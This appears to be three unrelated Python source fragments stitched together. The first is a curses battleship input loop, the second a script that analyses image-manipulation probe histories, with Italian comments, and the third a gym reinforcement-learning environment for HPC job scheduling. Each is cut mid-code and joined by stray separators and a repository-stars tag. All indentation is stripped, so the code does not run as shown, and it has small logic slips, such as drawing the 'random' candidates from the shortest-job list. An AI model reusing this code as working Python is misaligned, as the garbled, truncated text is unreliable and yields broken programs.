screen.addstr(0, 0, prompt_str)
x = int(screen.getstr(0, l))
while x >= 10 or x <= -1:
screen.clear()
screen.addstr(0, 0, 'You didn\'t enter a number between 0 and 9.')
screen.refresh()
wait()
screen.clear()
screen.addstr(0, 0, prompt_str)
x = int(screen.getstr(0, l))
break
except:
screen.clear()
screen.addstr(0, 0, 'You didn\'t enter a number between 0 and 9.')
screen.refresh()
wait()
screen.clear()
wait()
while True:
try:
prompt_str = 'Where do you want the first y coordinate of this ship to be? Enter a number between 0 to 9: '
l = len(prompt_str)
screen.addstr(0, 0, prompt_str)
y = int(screen.getstr(0, l))
while y >= 10 or y <= -1:
screen.clear()
screen.addstr(0, 0, 'You didn\'t enter a number between 0 and 9.')
screen.refresh()
wait()
screen.clear()
screen.addstr(0, 0, prompt_str)
y = int(screen.getstr(0, l))
break
except:
screen.clear()
screen.addstr(0, 0, 'You didn\'t enter a number between 0 and 9.')
screen.refresh()
wait()
screen.clear()
wait()
xc = x
yc = 9 - y
if xc <= 2 and yc != 1 and yc != 8 and yc != 0 and yc != 9 and yc != 2 and yc != 7:
while True:
try:
prompt_str = 'Which direction do you want your ship to extend in? Enter up, down, or right: '
l = len(prompt_str)
screen.addstr(0, 0, prompt_str)
zc = screen.getstr(0, l).lower()
while zc != 'up' and zc != 'down' and zc != 'right':
screen.clear()
screen.addstr(0, 0, 'You didn\'t enter a direction that was allowed.')
screen.refresh()
wait()
screen.clear()
screen.addstr(0, 0, prompt_str)
zc = screen.getstr(0, l).lower()
break
except:
screen.clear()
screen.addstr(0, 0, 'You didn\'t enter a direction that was allowed.')
screen.refresh()
wait()
elif xc >= 7 and yc != 1 and yc != 8 and yc != 0 and yc != 9 and yc != 2 and yc != 7:
while True:
try:
prompt_str = 'Which direction do you want your ship to extend in? Enter up, down, or left: '
l = len(prompt_str)
screen.addstr(0, 0, prompt_str)
zc = screen.getstr(0, l).lower()
while zc != 'up' and zc != 'down' and zc != 'left':
screen.clear()
screen.addstr(0, 0, 'You didn\'t enter a direction that was allowed.')
screen.refresh()
wait()
screen.clear()
screen.addstr(0, 0, prompt_str)
zc = screen.getstr(0, l).lower()
break
except:
screen.clear()
screen.addstr(0, 0, 'You didn\'t enter a direction that was allowed.')
screen.refresh()
wait()
elif yc <= 2 and xc != 2 and xc != 7 and xc != 1 and xc != 8 and xc != 0 and xc != 9:
while True:
try:
prompt_str = 'Which direction do you want your ship to extend in? Enter down, left, or right: '
l = len(prompt_str)
screen.addstr(0, 0, prompt_str)
zc = screen.getstr(0, l).lower()
while zc != 'left' and zc != 'down' and zc != 'right':
screen.clear()
screen.addstr(0, 0, 'You didn\'t enter a direction that was allowed.')
screen.refresh()
wait()
screen.clear()
screen.addstr(0, 0, prompt_str)
zc = screen.getstr(0, l).lower()
break
except:
screen.clear()
screen.addstr(0, 0, 'You didn\'t enter a direction that was allowed.')
screen.refresh()
wait()
elif yc >= 7 and xc != 2 and xc != 7 and xc != 1 and xc != 8 and xc != 0 and xc != 9:
while True:
try:
prompt_str = 'Which direction do you want your ship to extend in? Enter up, left, or right: '
l = len(prompt_str)
screen.addstr(0, 0, prompt_str)
zc = screen.getstr(0, l).lower()
while zc != 'up' and zc != 'left' and zc != 'right':
screen.clear()
screen.addstr(0, 0, 'You didn\'t enter a direction that was allowed.')
screen.refresh()
wait()
screen.clear()
screen.addstr(0, 0, prompt_str)
zc = screen.getstr(0, l).lower()
break
except:
screen.clear()
screen.addstr(0, 0, 'You didn\'t enter a direction that was allowed.')
screen.refresh()
wait()
elif xc <= 2 and yc <= 2:
while True:
try:
prompt_str = 'Which direction do you want your ship to extend in? Enter down or right: '
l = len(prompt_str)
screen.addstr(0, 0, prompt_str)
zc = screen.getstr(0, l).lower()
while zc != 'down' and zc != 'right':
screen.clear()
screen.addstr(0, 0, 'You didn\'t enter a direction that was allowed.')
screen.refresh()
wait()
screen.clear()
screen.addstr(0, 0, prompt_str)
zc = screen.getstr(0, l).lower()
break
except:
screen.clear()
screen.addstr(0, 0, 'You didn\'t enter a direction that was allowed.')
screen.refresh()
wait()
elif xc <= 2 and yc >= 7:
while True:
try:
prompt_str = 'Which direction do you want your ship to extend in? Enter up or right: '
l = len(prompt_str)
screen.addstr(0, | |
<gh_stars>0
import csv
import json
import numpy as np
from parse import *
import sys
import argparse
from argparse import RawTextHelpFormatter
# import matplotlib.pyplot as plt
# import pandas as pd
# import numpy as np
def CSVreader(path):
with open(path) as f:
reader = csv.reader(f, delimiter='|', quoting=csv.QUOTE_NONE)
rows = []
for row in reader:
rows.append(row)
return rows
def printInColumn(A):
if (A is None) or (A == '[]') or (A == []) or (A == ''):
print('None')
else:
for i in range(len(A)):
print(A[i])
def sortScoreMatrix(matrix):
for i in range(len(matrix)):
for k in range(i,len(matrix)):
if matrix[i][1] < matrix[k][1]:
tmpRows = matrix[i]
matrix[i] = matrix[k]
matrix[k] = tmpRows
return matrix
def check(A):
check = False
if A != None:
for i in range(len(A)):
for j in range(len(A)):
if A[i] == A[j] and i != j:
check = True
return check
def createJsonProbeHistory(probePath, journalPath, operationsPath):
A = CSVreader(probePath)
A.remove(A[0])
# creo il bigArray
pastValue = A[0]
Operations = []
k = 0
B = []
bigArray = []
for i in range(len(A)):
currentValue = A[i]
if currentValue[0] == pastValue[0]:
B.append(currentValue)
else:
bigArray.append(B)
B = []
B.append(currentValue) # risolve il problema che non printa la 1°
pastValue = currentValue
if i == len(A) - 1:
bigArray.append(B)
# ordino secondo Sequence che è la quarta posizione della tabella
tmpRows = []
for i in range(len(bigArray)):
for j in range(len(bigArray[i])):
for k in range(j, len(bigArray[i])):
if bigArray[i][j][4] < bigArray[i][k][4]:
tmpRows = bigArray[i][j]
bigArray[i][j] = bigArray[i][k]
bigArray[i][k] = tmpRows
tmpRows = []
# confronto con l'altro csv per stampare l' Operation. Inserisco tutto dentro C
B = CSVreader(journalPath)
C = []
C2 = []
tmpOP = []
for i in range(len(bigArray)):
for j in range(len(bigArray[i])):
for k in range(len(B)):
if (bigArray[i][j][1] == B[k][0]) and (bigArray[i][j][2] == B[k][1]) and (
(bigArray[i][j][3] == B[k][2])):
# print(B[k][0],B[k][3],B[k][5],B[k][6])
tmp = [bigArray[i][j][0], B[k][3], B[k][5], B[k][6], ""]
tmpOP.append([bigArray[i][j][0], B[k][3], B[k][5], B[k][6], ""])
C.append(tmp)
C2.append(tmpOP)
tmpOP = []
# apro il JSON e inserisco la descrizione dentro l'array C.
with open(operationsPath) as f:
data = json.load(f)
# pprint(data) #stampa tutto
# print(data.keys()) # stampa tutte le keys principali
# print(data['operations'][0].keys()) # stampa tutte le keys di operations[0]
# print(data['operations'][0]['name']) #stampa il valore della key name dentro operations[0]
# print(len(data['operations'])) #stampa il numero di operation presenti in operations
for i in range(len(C2)):
for k in range(len(C2[i])):
for j in range(len(data['operations'])):
if C2[i][k][1] == data['operations'][j]['name']:
C2[i][k][4] = data['operations'][j]['description']
# print(i, B[k][3], B[k][5], B[k][6], B[k][7])
# Creo un file JSON
totalProbes = []
probes = {}
tmpOperations = {}
for i in range(len(C2)):
probeOperations = []
for j in range(len(C2[i])):
tmpOperations = {
"name": C2[i][j][1],
"purpose": C2[i][j][2],
"operationArgument": C2[i][j][3],
"description": C2[i][j][4]
}
probeOperations.append(tmpOperations)
probes = {
"probeID": C2[i][0][0],
"operations": probeOperations
}
totalProbes.append(probes)
probesFile = {
"probesFileID": totalProbes
}
with open('./probeHistory.json', 'w') as fp:
json.dump(probesFile, fp, indent=4, ensure_ascii=False)
print('JSON file has been created')
def addCameraReference(matrix,camera):
X = []
Y = []
tmp = []
for i in range(len(matrix)):
for j in range(len(camera)):
if ((matrix[i][0] == camera[j][1]) and (matrix[i][1]) == camera[j][3]):
tmp.append(matrix[i][0])
tmp.append(matrix[i][1])
tmp.append(matrix[i][2])
tmp.append(camera[j][5])
tmp.append(camera[j][2].split(".", 1)[1])
if (camera[j][5]) == 'Y':
X.append(tmp)
else:
Y.append(tmp)
tmp = []
matrix = X + Y
return matrix
def division(finalScorePath, opHistoryPath, cameraPath, valore_soglia, valore_optout,returnFlag = 0):
# finalScore.csv
scoreMatrix = CSVreader(finalScorePath)
scoreMatrix.remove(scoreMatrix[0]) # Rimuovo l'intestazione
# probeHistory.json
# Leggo csv ManipReference
camera = CSVreader(cameraPath)
camera.remove(camera[0]) # Rimuovo l'intestazione
# Leggo le probe history
with open(opHistoryPath) as f:
opHistory = json.load(f)
# Matrice contenente: ProbeID,score=valore_optout
scoreMatrix_opt = []
# Matrice contenente ProbeID,score!= valore_opyout
scoreMatrix_no_opt = []
# Matrice contenente i ProbeID che non si trovano nel json
noJSON = []
tmp = []
count = 0
match = False
for i in range(len(scoreMatrix)):
for j in range(len(opHistory['probesFileID'])):
if scoreMatrix[i][0] == opHistory['probesFileID'][j]['probeID']:
match = True
if scoreMatrix[i][3] == str(valore_optout):
tmp.append(scoreMatrix[i][0]) # Probe
tmp.append(scoreMatrix[i][1]) # Camera
tmp.append(scoreMatrix[i][3]) # Score
scoreMatrix_opt.append(tmp) # Probe|Camera|Score
tmp = []
else:
tmp.append(scoreMatrix[i][0]) # Probe
tmp.append(scoreMatrix[i][1]) # Camera
tmp.append(scoreMatrix[i][3]) # Score
scoreMatrix_no_opt.append(tmp) # Probe|Camera|Score
tmp = []
if match == False:
count = count + 1
tmp.append(scoreMatrix[i][0]) # Probe
tmp.append(scoreMatrix[i][1]) # Camera
tmp.append(scoreMatrix[i][3]) # Score
noJSON.append(tmp) # Probe|Camera|Score
tmp = []
match = False
scoreMatrix_opt = addCameraReference(scoreMatrix_opt,camera)
scoreMatrix_no_opt = addCameraReference(scoreMatrix_no_opt,camera)
noJSON = addCameraReference(noJSON,camera)
# ANALISI di scoreMatrix_no_opt
MATCHED = []
NOMATCHED = []
for i in range(len(scoreMatrix_no_opt)):
if (float(scoreMatrix_no_opt[i][2]) >= valore_soglia):
MATCHED.append(scoreMatrix_no_opt[i])
else:
NOMATCHED.append(scoreMatrix_no_opt[i])
# noJSON è una matrice contenente: ProbeID,score,isManipulated/notManipulated raggruppata per Y(yes is manipulated)
if returnFlag == 0:
print('')
print('probe with score = ',valore_optout)
printInColumn(scoreMatrix_opt)
print('')
print('probe with score >= ', valore_soglia)
printInColumn(MATCHED)
print('')
print('probe with score < ', valore_soglia)
printInColumn(NOMATCHED)
print('')
print('------------- probe not found in json history -------------------- ')
printInColumn(noJSON)
if returnFlag == 1:
return scoreMatrix_opt,MATCHED,NOMATCHED,noJSON
def AddHistoryManip(scoreMatrix,opHistory):
tmpMatrix = []
tmp = []
for i in range(len(scoreMatrix)):
for j in range(len(opHistory['probesFileID'])):
if scoreMatrix[i][0] == opHistory['probesFileID'][j]['probeID']:
tmp.append(scoreMatrix[i][0])
tmp.append(scoreMatrix[i][1])
tmp.append(scoreMatrix[i][2])
tmp.append(scoreMatrix[i][3])
tmp.append(scoreMatrix[i][4])
tmp.append(opHistory['probesFileID'][j]['operations'])
tmpMatrix.append(tmp)
tmp = []
return tmpMatrix
def AddHistory(scoreMatrix,opHistory):
tmpMatrix = []
tmp = []
maxlenght = 0
for i in range(len(scoreMatrix)):
for j in range(len(opHistory['probesFileID'])):
if scoreMatrix[i][0] == opHistory['probesFileID'][j]['probeID']:
tmp.append(scoreMatrix[i][0])
tmp.append(scoreMatrix[i][1])
tmp.append(scoreMatrix[i][3])
tmp.append(opHistory['probesFileID'][j]['operations'])
if len(opHistory['probesFileID'][j]['operations'])> maxlenght:
maxlenght = len(opHistory['probesFileID'][j]['operations'])
tmpMatrix.append(tmp)
tmp = []
return tmpMatrix,maxlenght
def countOp(matrix):
countOp = 0
tmp = []
repeatOp = []
foundOp = False
for i in range(len(matrix)):
for j in range(len(matrix[i][5])):
for k in range(len(repeatOp)):
if matrix[i][5][j]['name'] == repeatOp[k][0]:
foundOp = True
break
if foundOp == False:
for t in range(len(matrix)):
for s in range(len(matrix[t][5])):
if matrix[i][5][j]['name'] == matrix[t][5][s]['name']:
countOp = countOp + 1
break
if countOp > 0:
tmp.append(matrix[i][5][j]['name'])
tmp.append(countOp)
repeatOp.append(tmp)
countOp = 0
tmp = []
foundOp = False
return repeatOp
def manipulation_analysis(finalScorePath, opHistoryPath, cameraPath, valore_soglia, valore_optout):
scoreMatrix_opt,MATCHED,NOMATCHED,noJSON = division(finalScorePath, opHistoryPath, cameraPath, valore_soglia, valore_optout,returnFlag = 1)
# Leggo le probe history
with open(opHistoryPath) as f:
opHistory = json.load(f)
scoreOperations_one = AddHistoryManip(scoreMatrix_opt,opHistory)
scoreOperations_no_one_matched = AddHistoryManip(MATCHED,opHistory)
scoreOperations_no_one_no_matched = AddHistoryManip(NOMATCHED,opHistory)
'''Conteggio ricorrenza operazioni in scoreMatrix_one, scoreMatrix_no_one_matched, scoreMatrix_no_one_no_matched'''
repeatOp_matched = countOp(scoreOperations_no_one_matched)
repeatOp_noMatched = countOp(scoreOperations_no_one_no_matched)
repeatOp_one = countOp(scoreOperations_one)
# Matrice globale contente: ProbeID,score
print('\nNumero di ProbeID nel CSV score: ', len(scoreMatrix_opt)+ len(MATCHED)+ len(NOMATCHED) + len(noJSON))
print('Numero di ProbeID nel JSON contente le storie: ', len(opHistory['probesFileID']))
print("")
print('Numero di ProbeID che matchano nel JSON contenente le storie, e quindi analizzabili: ', len(scoreMatrix_opt) + len(MATCHED)+ len(NOMATCHED))
print('Numero di ProbeID non trovate nel JSON contenente storie: ', len(noJSON))
print("")
print('--------------- Probe trovate nel Json contente le storie --------------------')
print(' Occorrenze delle operazioni')
repeatOp_oneSorted = sortScoreMatrix(repeatOp_one)
repeatOp_no_MatchedSorted = sortScoreMatrix(repeatOp_noMatched)
repeatOp_matchedSorted = sortScoreMatrix(repeatOp_matched)
print('score =',valore_optout, ' n° probe =',len(scoreMatrix_opt))
printInColumn(repeatOp_oneSorted)
print("")
print('score <', valore_soglia, ' n° probe =',len(NOMATCHED))
printInColumn(repeatOp_no_MatchedSorted)
print("")
print('score >=', valore_soglia, ' n° probe =',len(MATCHED))
printInColumn(repeatOp_matchedSorted)
print("")
print('--------------- Probe NON trovate nel Json contente le storie-------------------- n° probe = ',len(noJSON))
printInColumn(noJSON)
def _scoreFilter1(i,tmpMatrix,opFilter,occurenceMatrix,tmpMatrix2):
tmp = []
countOperations = 0
objPosition = -1
atLeastOneOp = False
p = 0 #probeID index
c = 1 #camera index
s = 2 #score index
op = 3 #operations index
tmp.append(tmpMatrix[i][p])
tmp.append(tmpMatrix[i][c])
for z in range(len(opFilter)):
currentOperation = opFilter[z]
currentMatrix = occurenceMatrix[z]
for j in range(len(tmpMatrix[i][op])):
countOperations = countOperations + 1
if (currentOperation == tmpMatrix[i][op][j]['name'].lower()):
objPosition = countOperations
break
if objPosition != -1:
tmp.append(tmpMatrix[i][op][j]['name'])
tmp.append(objPosition)
atLeastOneOp = True
currentMatrix[objPosition -1][len(tmpMatrix[i][op]) - 1] = currentMatrix[objPosition -1][len(tmpMatrix[i][op]) -1] + 1
occurenceMatrix[z] = currentMatrix
objPosition = -1
countOperations = 0
tmp.append('lenght:' + " " +str(len(tmpMatrix[i][op])))
tmp.append('score:' + " "+ str((tmpMatrix[i][s])))
if atLeastOneOp == True:
tmpMatrix2.append(tmp)
tmp = []
atLeastOneOp = False
def scoreFilter1(finalScorePath, opHistoryPath, score, opFilter, operator='null', score2 = None):
s = 2
scoreMatrix = CSVreader(finalScorePath)
scoreMatrix.remove(scoreMatrix[0]) # Rimuovo l'intestazione
# probeHistory.json
with open(opHistoryPath) as f:
opHistory = json.load(f)
opFilter= [x.lower() for x in opFilter]
duplicateOP = check(opFilter)
if duplicateOP == False:
tmpMatrix,maxlenght = AddHistory(scoreMatrix,opHistory)
result = []
tmpMatrix2 = []
occurenceMatrix = []
for i in range(len(opFilter)):
occurenceMatrix.append(np.zeros((int(maxlenght),int(maxlenght))))
if operator == 'null':
print('errore,inserire operazioni')
elif (operator == 'equal'):
for i in range(len(tmpMatrix)):
if float(tmpMatrix[i][s]) == score:
_scoreFilter1(i,tmpMatrix,opFilter,occurenceMatrix,tmpMatrix2)
for i in range(len(tmpMatrix2)):
result.append(tmpMatrix2[i])
for i in range(len(occurenceMatrix)):
print(occurenceMatrix[i])
print("")
return result
elif (operator == 'over') and (score >= 0):
for i in range(len(tmpMatrix)):
if float(tmpMatrix[i][s]) >= score:
_scoreFilter1(i,tmpMatrix,opFilter,occurenceMatrix,tmpMatrix2)
for i | |
from HPC_Task import Task, Workloads
from HPC_Cluster import Cluster
import os
import math
import json
import time
import sys
import random
from random import shuffle
import numpy as np
import tensorflow as tf
import tensorflow.compat.v1 as tf
tf.disable_v2_behavior()
import scipy.signal
import gym
from gym import spaces
from gym.spaces import Box, Discrete
from gym.utils import seeding
#define MAX queue Size
MAX_QUEUE_SIZE = 512
#define MLP Size
MLP_SIZE = 1024
MAX_WAIT_TIME = 8 * 60 * 60 # wait time is 8 hours.
MAX_RUN_TIME = 8 * 60 * 60 # runtime is 8 hours
# each task has three features: wait_time, cost , runtime, machine states,
TASK_FEATURES = 4
DEBUG = False
TASK_SEQUENCE_SIZE = 512
def combined_shape(length, shape=None):
if shape is None:
return (length,)
return (length, shape) if np.isscalar(shape) else (length, *shape)
def placeholder(dim=None):
return tf.placeholder(dtype=tf.float32, shape=combined_shape(None, dim))
def placeholders(*args):
return [placeholder(dim) for dim in args]
def placeholder_from_space(space):
if isinstance(space, Box):
return placeholder(space.shape)
elif isinstance(space, Discrete):
return tf.placeholder(dtype=tf.int32, shape=(None,))
raise NotImplementedError
def placeholders_from_spaces(*args):
return [placeholder_from_space(space) for space in args]
def get_vars(scope=''):
return [x for x in tf.trainable_variables() if scope in x.name]
def count_vars(scope=''):
v = get_vars(scope)
return sum([np.prod(var.shape.as_list()) for var in v])
def discount_cumsum(x, discount):
return scipy.signal.lfilter([1], [1, float(-discount)], x[::-1], axis=0)[::-1]
class HPC_Environment(gym.Env):
def __init__(self):
super(HPC_Environment, self).__init__()
print("Initialize")
self.action_space = spaces.Discrete(MAX_QUEUE_SIZE)
self.observation_space = spaces.Box(low=0.0, high=1.0,
shape=(TASK_FEATURES * MAX_QUEUE_SIZE,),
dtype=np.float32)
self.task_queue = []
self.running_tasks = []
self.visible_tasks = []
self.pairs = []
self.current_timestamp = 0
self.start = 0
self.next_arriving_task_idx = 0
self.last_task_in_batch = 0
self.num_task_in_batch = 0
self.start_idx_last_reset = 0
self.loads = None
self.cluster = None
self.bsld_algo_dict = {}
self.scheduled_rl = {}
self.penalty = 0
self.pivot_task = False
self.scheduled_scores = []
self.enable_preworkloads = False
self.pre_workloads = []
def my_init(self, workload_file='', sched_file=''):
print("loading from dataset:", workload_file)
self.loads = Workloads(workload_file)
self.cluster = Cluster("Cluster", self.loads.max_nodes, self.loads.max_procs / self.loads.max_nodes)
self.penalty_task_score = TASK_SEQUENCE_SIZE * self.loads.max_exec_time / 10
def seed(self, seed=None):
self.np_random, seed = seeding.np_random(seed)
return [seed]
def f1_score(self, task):
submit_time = task.submit_time
request_processors = task.request_number_of_processors
request_time = task.request_time
return (np.log10(request_time) * request_processors + 870 * np.log10(submit_time))
def f2_score(self, task):
submit_time = task.submit_time
request_processors = task.request_number_of_processors
request_time = task.request_time
return (np.sqrt(request_time) * request_processors + 25600 * np.log10(submit_time))
def f3_score(self, task):
submit_time = task.submit_time
request_processors = task.request_number_of_processors
request_time = task.request_time
return (request_time * request_processors + 6860000 * np.log10(submit_time))
def f4_score(self, task):
submit_time = task.submit_time
request_processors = task.request_number_of_processors
request_time = task.request_time
return (request_time * np.sqrt(request_processors) + 530000 * np.log10(submit_time))
def sjf_score(self, task):
request_time = task.request_time
submit_time = task.submit_time
return (request_time, submit_time)
def smallest_score(self, task):
request_processors = task.request_number_of_processors
submit_time = task.submit_time
return (request_processors, submit_time)
def wfp_score(self, task):
submit_time = task.submit_time
request_processors = task.request_number_of_processors
request_time = task.request_time
waiting_time = task.scheduled_time - task.submit_time
return -np.power(float(waiting_time) / request_time, 3) * request_processors
def uni_score(self, task):
submit_time = task.submit_time
request_processors = task.request_number_of_processors
request_time = task.request_time
waiting_time = task.scheduled_time - task.submit_time
return -(waiting_time + 1e-15) / (np.log2(request_processors + 1e-15) * request_time)
def fcfs_score(self, task):
submit_time = task.submit_time
return submit_time
def gen_preworkloads(self, size):
running_task_size = size
for i in range(running_task_size):
_task = self.loads[self.start - i - 1]
req_num_of_processors = _task.request_number_of_processors
runtime_of_task = _task.request_time
task_tmp = Task()
task_tmp.task_id = (-1 - i)
task_tmp.request_number_of_processors = req_num_of_processors
task_tmp.run_time = runtime_of_task
if self.cluster.can_allocated(task_tmp):
self.running_tasks.append(task_tmp)
task_tmp.scheduled_time = max(0, (self.current_timestamp - random.randint(0, max(runtime_of_task, 1))))
task_tmp.allocated_machines = self.cluster.allocate(task_tmp.task_id, task_tmp.request_number_of_processors)
self.pre_workloads.append(task_tmp)
else:
break
def refill_preworkloads(self):
for _task in self.pre_workloads:
self.running_tasks.append(_task)
_task.allocated_machines = self.cluster.allocate(_task.task_id, _task.request_number_of_processors)
def reset(self):
self.cluster.reset()
self.loads.reset()
self.task_queue = []
self.running_tasks = []
self.visible_tasks = []
self.pairs = []
self.current_timestamp = 0
self.start = 0
self.next_arriving_task_idx = 0
self.last_task_in_batch = 0
self.num_task_in_batch = 0
self.scheduled_rl = {}
self.penalty = 0
self.pivot_task = False
self.scheduled_scores = []
task_sequence_size = TASK_SEQUENCE_SIZE
self.pre_workloads = []
self.start = self.np_random.randint(task_sequence_size, (self.loads.size() - task_sequence_size - 1))
self.start_idx_last_reset = self.start
self.num_task_in_batch = task_sequence_size
self.last_task_in_batch = self.start + self.num_task_in_batch
self.current_timestamp = self.loads[self.start].submit_time
self.task_queue.append(self.loads[self.start])
self.next_arriving_task_idx = self.start + 1
if self.enable_preworkloads:
self.gen_preworkloads(task_sequence_size + self.np_random.randint(task_sequence_size))
self.scheduled_scores.append(sum(self.schedule_curr_sequence_reset(self.sjf_score).values()))
self.scheduled_scores.append(sum(self.schedule_curr_sequence_reset(self.smallest_score).values()))
self.scheduled_scores.append(sum(self.schedule_curr_sequence_reset(self.fcfs_score).values()))
self.scheduled_scores.append(sum(self.schedule_curr_sequence_reset(self.f1_score).values()))
self.scheduled_scores.append(sum(self.schedule_curr_sequence_reset(self.f2_score).values()))
self.scheduled_scores.append(sum(self.schedule_curr_sequence_reset(self.f3_score).values()))
self.scheduled_scores.append(sum(self.schedule_curr_sequence_reset(self.f4_score).values()))
return self.build_observation(), self.build_critic_observation()
def reset_for_test(self, num, start):
self.cluster.reset()
self.loads.reset()
self.task_queue = []
self.running_tasks = []
self.visible_tasks = []
self.pairs = []
self.current_timestamp = 0
self.start = 0
self.next_arriving_task_idx = 0
self.last_task_in_batch = 0
self.num_task_in_batch = 0
self.scheduled_rl = {}
self.penalty = 0
self.pivot_task = False
self.scheduled_scores = []
task_sequence_size = num
self.start = self.np_random.randint(task_sequence_size, (self.loads.size() - task_sequence_size - 1))
self.start_idx_last_reset = self.start
self.num_task_in_batch = task_sequence_size
self.last_task_in_batch = self.start + self.num_task_in_batch
self.current_timestamp = self.loads[self.start].submit_time
self.task_queue.append(self.loads[self.start])
self.next_arriving_task_idx = self.start + 1
def moveforward_for_resources_backfill_greedy(self, task, scheduled_logs):
assert not self.cluster.can_allocated(task)
earliest_start_time = self.current_timestamp
self.running_tasks.sort(key=lambda running_task: (running_task.scheduled_time + running_task.request_time))
free_processors = self.cluster.free_node * self.cluster.num_procs_per_node
for running_task in self.running_tasks:
free_processors += len(running_task.allocated_machines) * self.cluster.num_procs_per_node
earliest_start_time = (running_task.scheduled_time + running_task.request_time)
if free_processors >= task.request_number_of_processors:
break
while not self.cluster.can_allocated(task):
#backfill tasks
self.task_queue.sort(key=lambda _j: self.fcfs_score(_j))
task_queue_iter_copy = list(self.task_queue)
for _j in task_queue_iter_copy:
if self.cluster.can_allocated(_j) and (self.current_timestamp + _j.request_time) < earliest_start_time:
assert _j.scheduled_time == -1
_j.scheduled_time = self.current_timestamp
_j.allocated_machines = self.cluster.allocate(_j.task_id, _j.request_number_of_processors)
self.running_tasks.append(_j)
score = (self.task_score(_j) / self.num_task_in_batch)
scheduled_logs[_j.task_id] = score
self.task_queue.remove(_j)
assert self.running_tasks
self.running_tasks.sort(key=lambda running_task: (running_task.scheduled_time + running_task.run_time))
next_resource_release_time = (self.running_tasks[0].scheduled_time + self.running_tasks[0].run_time)
next_resource_release_machines = self.running_tasks[0].allocated_machines
if self.next_arriving_task_idx < self.last_task_in_batch \
and self.loads[self.next_arriving_task_idx].submit_time <= next_resource_release_time:
self.current_timestamp = max(self.current_timestamp, self.loads[self.next_arriving_task_idx].submit_time)
self.task_queue.append(self.loads[self.next_arriving_task_idx])
self.next_arriving_task_idx += 1
else:
self.current_timestamp = max(self.current_timestamp, next_resource_release_time)
self.cluster.release(next_resource_release_machines)
self.running_tasks.pop(0)
def schedule_curr_sequence_reset(self, score_fn):
scheduled_logs = {}
while True:
self.task_queue.sort(key=lambda j: score_fn(j))
task_for_scheduling = self.task_queue[0]
if not self.cluster.can_allocated(task_for_scheduling):
self.moveforward_for_resources_backfill_greedy(task_for_scheduling, scheduled_logs)
assert task_for_scheduling.scheduled_time == -1
task_for_scheduling.scheduled_time = self.current_timestamp
task_for_scheduling.allocated_machines = self.cluster.allocate(task_for_scheduling.task_id,
task_for_scheduling.request_number_of_processors)
self.running_tasks.append(task_for_scheduling)
score = (self.task_score(task_for_scheduling) / self.num_task_in_batch)
scheduled_logs[task_for_scheduling.task_id] = score
self.task_queue.remove(task_for_scheduling)
not_empty = self.moveforward_for_task()
if not not_empty:
break
self.cluster.reset()
self.loads.reset()
self.task_queue = []
self.running_tasks = []
self.visible_tasks = []
self.pairs = []
self.current_timestamp = self.loads[self.start].submit_time
self.task_queue.append(self.loads[self.start])
self.last_task_in_batch = self.start + self.num_task_in_batch
self.next_arriving_task_idx = self.start + 1
if self.enable_preworkloads:
self.refill_preworkloads()
return scheduled_logs
def build_critic_observation(self):
vector = np.zeros(TASK_SEQUENCE_SIZE * 3, dtype=float)
earlist_task = self.loads[self.start_idx_last_reset]
earlist_submit_time = earlist_task.submit_time
pairs = []
for i in range(self.start_idx_last_reset, self.last_task_in_batch + 1):
task = self.loads[i]
submit_time = task.submit_time - earlist_submit_time
request_processors = task.request_number_of_processors
request_time = task.request_time
normalized_submit_time = min(float(submit_time) / float(MAX_WAIT_TIME), 1.0 - 1e-5)
normalized_run_time = min(float(request_time) / float(self.loads.max_exec_time), 1.0 - 1e-5)
normalized_request_nodes = min(float(request_processors) / float(self.loads.max_procs), 1.0 - 1e-5)
pairs.append([normalized_submit_time, normalized_run_time, normalized_request_nodes])
for i in range(TASK_SEQUENCE_SIZE):
vector[i * 3:(i + 1) * 3] = pairs[i]
return vector
def build_observation(self):
vector = np.zeros((MAX_QUEUE_SIZE) * TASK_FEATURES, dtype=float)
self.task_queue.sort(key=lambda task: self.fcfs_score(task))
self.visible_tasks = []
for i in range(0, MAX_QUEUE_SIZE):
if i < len(self.task_queue):
self.visible_tasks.append(self.task_queue[i])
else:
break
self.visible_tasks.sort(key=lambda j: self.fcfs_score(j))
self.visible_tasks = []
if len(self.task_queue) <= MAX_QUEUE_SIZE:
for i in range(0, len(self.task_queue)):
self.visible_tasks.append(self.task_queue[i])
else:
visible_f1 = []
f1_index = 0
self.task_queue.sort(key=lambda task: self.f1_score(task))
for i in range(0, MAX_QUEUE_SIZE):
visible_f1.append(self.task_queue[i])
visible_f2 = []
f2_index = 0
self.task_queue.sort(key=lambda task: self.f2_score(task))
for i in range(0, MAX_QUEUE_SIZE):
visible_f2.append(self.task_queue[i])
visible_sjf = []
sjf_index = 0
self.task_queue.sort(key=lambda task: self.sjf_score(task))
for i in range(0, MAX_QUEUE_SIZE):
visible_sjf.append(self.task_queue[i])
visible_small = []
small_index = 0
self.task_queue.sort(key=lambda task: self.smallest_score(task))
for i in range(0, MAX_QUEUE_SIZE):
visible_small.append(self.task_queue[i])
visible_random = []
random_index = 0
shuffled = list(self.task_queue)
shuffle(shuffled)
for i in range(0, MAX_QUEUE_SIZE):
visible_random.append(shuffled[i])
index = 0
while index < MAX_QUEUE_SIZE:
f1_task = visible_f1[f1_index]
f1_index += 1
f2_task = visible_f2[f2_index]
f2_index += 1
sjf_task = visible_sjf[sjf_index]
sjf_index += 1
small_task = visible_small[small_index]
small_index += 1
random_task = visible_sjf[random_index]
random_index += 1
if (not sjf_task in self.visible_tasks) and index < MAX_QUEUE_SIZE:
self.visible_tasks.append(sjf_task)
index += 1
if (not small_task in self.visible_tasks) and index < MAX_QUEUE_SIZE:
self.visible_tasks.append(small_task)
index += 1
if (not random_task in self.visible_tasks) and index < MAX_QUEUE_SIZE:
self.visible_tasks.append(random_task)
index += 1
self.pairs = []
add_skip = False
for i in range(0, MAX_QUEUE_SIZE):
if i < len(self.visible_tasks) and i < (MAX_QUEUE_SIZE):
task = self.visible_tasks[i]
submit_time = task.submit_time
request_processors = task.request_number_of_processors
request_time = task.request_time
wait_time = self.current_timestamp - submit_time
normalized_wait_time = min(float(wait_time) / float(MAX_WAIT_TIME), 1.0 - 1e-5)
normalized_run_time = min(float(request_time) / float(self.loads.max_exec_time), 1.0 - 1e-5)
normalized_request_nodes = min(float(request_processors) / float(self.loads.max_procs), 1.0 - 1e-5)
if self.cluster.can_allocated(task):
can_schedule_now = 1.0 - 1e-5
else:
can_schedule_now = 1e-5
self.pairs.append(
[task, normalized_wait_time, normalized_run_time, normalized_request_nodes, can_schedule_now])
else:
self.pairs.append([None, 0, 1, 1, 0])
for i in range(0, MAX_QUEUE_SIZE):
